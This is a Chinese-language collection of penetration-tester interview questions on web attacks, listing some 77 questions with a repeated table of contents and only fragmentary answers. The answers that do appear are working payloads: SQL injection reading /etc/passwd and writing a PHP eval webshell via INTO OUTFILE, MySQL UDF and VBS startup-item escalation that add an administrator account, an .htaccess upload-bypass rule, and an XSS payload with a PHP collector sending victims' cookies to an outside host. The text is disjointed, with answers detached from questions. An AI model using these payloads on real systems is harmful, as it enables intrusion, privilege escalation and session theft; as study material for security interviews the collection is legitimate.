渗透测试工程师面试题总结(一)
目录
2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?
7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?
9.如何手工快速判断目标站是 windows 还是 linux 服务器?
10.为何一个 mysql 数据库的站,只有一个 80 端口开放?
14.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?
17.access 扫出后缀为 asp 的数据库文件,访问乱码。如何实现到本地利用?
19.某服务器有站点 A,B 为何在 A 的后台添加 test 用户,访问 B 的后台。发现也添加上了 test 用户?
20.注入时可以不使用 and 或 or 或 xor,直接 order by 开始注入吗?
24.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?
25.目标站发现某 txt 的下载地址为 http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?
26.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和 admin 目录。请问你的想法是?
27.在有 shell 的情况下,如何使用 xss 实现对目标站的长久控制?
28.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?
29.目标站无防护,上传图片可以正常访问,上传脚本格式访问则 403.什么原因?
31.在 win2003 服务器中建立一个 .zhongzi 文件夹用意何为?
32.sql 注入有以下两个测试选项,选一个并且阐述不选另一个的理由?
33.以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路?
34 发现 demo.jsp?uid=110 注入点,你有哪几种思路获取 webshell,哪种是优选?
35.CSRF 和 XSS 和 XXE 有什么区别,以及修复方式?
38 圈出下面会话中可能存在问题的项,并标注可能会存在的问题?
56.img 标签除了 onerror 属性外,还有其他获取管理员路径的办法吗?
57.img 标签除了 onerror 属性外,并且 src 属性的后缀名,必须以.jpg 结尾, 怎么获取管理员路径?
60.列举出 oracle 注入获取管理员权限提权典型漏洞?
62、mssql 提权提示错误代码 5,cmd 权限不足的原因?
63.怎么用 sqlmap 对 sa 权限的 mssql 2008 进行提权?
71.HTTP 协议 head 方法的功能与 get 方法不同之处是?
77.tcp、udp 的区别及 tcp 三次握手,syn 攻击?
1.拿到一个待检测的站,你觉得应该先做什么?
2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?
3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?
4.判断出网站的 CMS 对渗透有什么意义?
5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?
6.常见的网站服务器容器?
7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?
对 web 目录有写的权限
union select 1,load_file('/etc/passwd'),3,4,5#
0x2f6574632f706173737764
union select 1,load_file(0x2f6574632f706173737764),3,4,5#
select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php'
select '<?php @eval($_POST["admin"]); ?>' into outfile
'C:\Windows\tmp\8.php'
<?php eval($_POST["admin"]); ?> 或者 <?php
eval($_GET["admin"]); ?>
<?php @eval($_POST["admin"]); ?>
<?php phpinfo(); ?>
<?php eval($_POST["admin"]); ?>
8.目前已知哪些版本的容器有解析漏洞,具体举例?
9.如何手工快速判断目标站是 windows 还是 linux 服务器?
10.为何一个 mysql 数据库的站,只有一个 80 端口开放?
11.3389 无法连接的几种情况?
12.如何突破注入时字符被转义?
13.在某后台新闻编辑界面看到编辑器,应该先做什么?
14.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?
15.注入漏洞只能查账号密码?
16.安全狗会追踪变量,从而发现出是一句话木马吗?
17.access 扫出后缀为 asp 的数据库文件,访问乱码。如何实现到本地利用?
18.提权时选择可读写目录,为何尽量不用带空格的目录?
19.某服务器有站点 A,B 为何在 A 的后台添加 test 用户,访问 B 的后台。发现也添加上了 test 用户?
20.注入时可以不使用 and 或 or 或 xor,直接 order by 开始注入吗?
21:某个防注入系统,在注入时会提示:统检测到你有非法注入的行为。已记录 您的 ip xx.xx.xx.xx 时间:2016:01-23 提交页面:test.asp?id=15 提交内容:and 1=1 如何利用这个防注入系统拿 shell?
22.上传大马后访问乱码时,有哪些解决办法?
23.审查上传点的元素有什么意义?
24.目标站禁止注册用户,找回密码处随便输入用户名提示:“此用户不存在”,你觉得这里怎样利用?
25.目标站发现某 txt 的下载地址为 http://www.test.com/down/down.php?file=/upwdown/1.txt,你有什么思路?
26.甲给你一个目标站,并且告诉你根目录下存在/abc/目录,并且此目录下存在编辑器和 admin 目录。请问你的想法是?
27.在有 shell 的情况下,如何使用 xss 实现对目标站的长久控制?
28.后台修改管理员密码处,原密码显示为*。你觉得该怎样实现读出这个用户的密码?
29.目标站无防护,上传图片可以正常访问,上传脚本格式访问则 403.什么原因?
30.审查元素得知网站所使用的防护软件,你觉得怎样做到的?
31.在 win2003 服务器中建立一个 .zhongzi 文件夹用意何为?
32.sql 注入有以下两个测试选项,选一个并且阐述不选另一个的理由?
33.以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路?
34 发现 demo.jsp?uid=110 注入点,你有哪几种思路获取 webshell,哪种是优选?
35.CSRF 和 XSS 和 XXE 有什么区别,以及修复方式?
36.CSRF、SSRF 和重放攻击有什么区别?
37.说出至少三种业务逻辑漏洞,以及修复方式?
38 圈出下面会话中可能存在问题的项,并标注可能会存在的问题?
39.找一类你最擅长的漏洞,谈下绕过漏洞修复后的方案?
40.你常用的渗透工具有哪些,最常用的是哪个?
41.描述一个你深入研究过的 CVE 或 POC?
42.谈谈你经常关注的安全平台?
43.给你一个网站你是如何来渗透测试的?
44.sqlmap,怎么对一个注入点注入?
45.nmap,扫描的几种方式?
46.sql 注入的几种类型?
47.报错注入的函数有哪些?
48.延时注入如何来判断?
49.盲注和延时注入的共同点?
50.如何拿一个网站的 webshell?
51.sql 注入写文件都有哪些函数?
52.如何防止 CSRF?
53.owasp 漏洞都有哪些?
54.SQL 注入防护方法?
55.代码执行,文件读取,命令执行的函数都有哪些?
56.img 标签除了 onerror 属性外,还有其他获取管理员路径的办法吗?
57.img 标签除了 onerror 属性外,并且 src 属性的后缀名,必须以.jpg 结尾, 怎么获取管理员路径?
58.怎么绕过 WAF 注入和上传以及 xss?
59.既然宽字节注入可以绕过单引号过滤,那么怎么来修复呢?
60.列举出 oracle 注入获取管理员权限提权典型漏洞?
61.mssql 提权的提权思路有哪些步骤?
62、mssql 提权提示错误代码 5,cmd 权限不足的原因?
63.怎么用 sqlmap 对 sa 权限的 mssql 2008 进行提权?
select name from sysobjects where xtype=u 通过这个来爆第一个表
select name from sysobjects where xtype=u and name not in(爆出来的表
1,爆出来的表 2...)
select table_name from information_schema.tables
select table_name from information_schema.tables where table_name
not in (爆出来的表 1,爆出来的表 2...)
64.xxe 注入有哪些危害以及防御 ?
65.gpc 魔术引号?
66.MYSQL 有哪些提权方法?
create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user iis_user 123!@#abcABC /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:web3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);
(2)VBS 启动项提权
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user
123!@#abcABC/add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup
administrators iis_user /add"",0) " );
select * from a into outfile "C:\Documents and Settings\All Users\「开始」
菜单\程序\启动\a.vbs";
67.什么叫 ssrf 以及 ssrf 的防御?
68.如何利用 php 的远程命令执行函数进行反弹 nc?
69.文件包含漏洞可以用来做啥,以及需要主要注意的事项?
70.文件上传有哪些技巧?
<FilesMatch “haha”>
SetHandler application/x-httpd-php
</FileMatch>
71.HTTP 协议 head 方法的功能与 get 方法不同之处是?
72.域和组的区别是什么?
73.对称加密非对称加密?
74.什么是同源策略?
75.cookie 存在哪里?可以打开吗?
76.xss 如何盗取 cookie?
攻击者代码:
<?php
$cookie=$_GET['cookie'];
$time=date('Y-m-d g:i:s');
$referer=getenv('HTTP_REFERER');
$cookietxt=fopen('cookie.txt','a');
fwrite($cookietxt,"time:".$time." cookie:".$cookie." referer:".$referer."");
注意双引号,容易出错
fclose($cookietxt);
?>
<script>
document.write('<img
src="http://ip/cookie.php?cookie='+document.cookie+'" width=0
height=0 border=0 />');
</script>